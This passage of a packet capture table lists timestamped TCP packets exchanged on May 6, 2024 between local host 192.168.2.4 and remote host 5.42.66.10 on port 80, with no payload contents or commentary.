May 6, 2024 07:53:08.703416109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703425884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703439951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703449011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703453064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703464985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703466892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703485966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703490019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703500032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703511000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703511000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703522921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703535080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703536987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703547001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703558922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703558922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703569889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703572989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703592062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703598976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703604937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703614950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703619003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703627110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703639984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703643084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703650951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703665972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703672886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703680038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703685999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703696012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703718901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703737974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703756094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703769922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703782082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703793049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703804016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703814983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703820944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703838110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703841925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703862906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703869104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703879118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703911066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703934908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703946114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703957081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703970909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703984022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703985929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703995943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703999996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704016924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704024076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704046965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704068899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704087019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704104900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704118967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704127073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704132080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704143047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704144001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704163074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704180002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704183102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704194069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704204082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704215050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704222918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704226971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704237938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704251051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704251051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704262972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704272985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704274893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704288006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704291105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704313040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704334974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704345942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704356909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704368114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704380035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704391003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704391003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704402924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704415083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704417944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704427004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704435110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704438925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704449892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704457045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704478979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704493046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704500914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704514027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704524994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704538107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704547882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704549074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704561949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704572916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704574108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704595089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704616070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704621077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704627991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704638004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704649925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704657078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704660892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704675913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704684973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704689980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704700947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704705000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704713106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704725027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704730034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704755068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704765081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704766989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704778910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704807043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704817057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704826117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704829931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704842091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704858065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704875946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704885006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704911947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704924107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704941034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704952955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.704962969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.704981089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705013037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705024958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705034971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705058098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705059052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705070972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705099106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705120087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705132961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705166101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705200911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705213070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705223083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705236912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705248117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705248117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705260038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705266953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705293894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705308914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705312014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705322027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705333948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705344915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705352068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705367088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705390930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705456972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705468893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705478907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705491066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705502987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705502987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705513954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705526114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705528975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705535889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705539942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705548048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705559969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705568075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705571890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705584049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705590010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705595970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705602884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705609083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705621004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705621958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705637932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705650091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705650091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705662012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705672026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705672979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705684900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705689907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705696106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705708981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705710888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705720901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705733061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705734968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705744028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705751896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705758095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705769062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705774069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705780983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705792904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705799103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705804110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705811024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705826044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705837965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705838919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705849886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705862045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705863953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705873966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705884933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705887079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705910921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705915928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705923080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705926895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705938101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705948114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705951929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705960989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705965996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705972910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.705982924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.705984116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706002951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706021070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706033945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706043959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706048012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706058025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706068039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706069946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706082106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706084013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706094027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706105947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706109047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706119061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706130981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706130981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706157923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706166029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706190109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706202984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706214905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706226110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706229925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706237078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706238985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706248999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706257105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706264019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706270933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706274986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706285954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706294060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706301928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706315994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706338882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706341028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706352949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706362963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706373930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706382036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706384897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706392050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706423998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706468105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706480980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706490993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706501961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706511974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706512928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706526041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706526041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706538916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706547022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706551075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706562996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706569910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706574917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706587076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706590891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706598997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706610918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706615925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706621885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706629992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706634998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706645966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706650972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706656933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706669092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706672907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706684113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706691980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706695080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706705093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706707954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706720114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706731081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706732035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706758022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706763983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706850052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706861019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706871986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706882000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706892014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706895113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706906080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706912994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706918001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706929922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706935883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706943035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706954002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706959009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706965923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706976891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.706976891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706988096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.706999063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707003117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707010984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707022905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707025051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707035065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707041025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707047939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707058907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707062006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707086086 CEST	49741	80	192.168.2.4	5.42.66.10
